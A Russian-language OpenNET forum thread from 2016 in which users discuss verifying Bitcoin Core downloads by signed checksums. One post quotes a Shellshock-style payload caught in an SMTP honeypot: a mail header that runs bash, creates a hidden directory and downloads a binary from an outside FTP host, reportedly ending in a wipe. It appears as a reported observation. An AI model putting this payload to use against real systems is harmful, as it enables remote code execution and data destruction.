The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Серия уязвимостей в продуктах Cisco, выявленных после публик..., opennews (??), 22-Авг-16, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


31. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Аноним (-), 22-Авг-16, 17:36 
Это был официальный tar.xz, распакованный в /home/username. Почему ты считаешь, что RPM-ка оттуда же была бы безопаснее?
Ответить | Правка | К родителю #21 | Наверх | Cообщить модератору

32. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от anonXYZ (?), 22-Авг-16, 17:54 
не неси чушь. ОФициальный blob bitcoin core в архиве ..tar.gz всегда идет.
sha1sum
d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz

Ответить | Правка | Наверх | Cообщить модератору

33. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от PnDx (ok), 22-Авг-16, 18:15 
>  sha1sum
>  d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
>  156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz

? Не поленился сходить на официалку, там подписанные sha256. Т.е. врукопашную качаем asc → проверяем подпись → качаем .tar.gz → проверяем сумму.
Наличие поддерживаемого репо сводит эти шаги к исходной проверке сигнатуры репозитория.
В описанном выше случае с высокой долей вероятности был применён виндо-подход "скачал-запустил", возможно даже из-под рута (т.к. логи "вдруг" не исчезают).

** Тут ко мне в "ловушку" прилетело по smtp:
To:() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;…
ну и т.д., в конце хамство с затиркой всего подряд.  Таки не понял, это что за почтовик шелл из-под рута дёргает? Судя по наличию робота, явление сравнительно массовое?

Ответить | Правка | Наверх | Cообщить модератору

39. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от ram_scan (?), 22-Авг-16, 21:15 
С разморозкой ;) Этой дырище уже наверное второй год пошел...
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру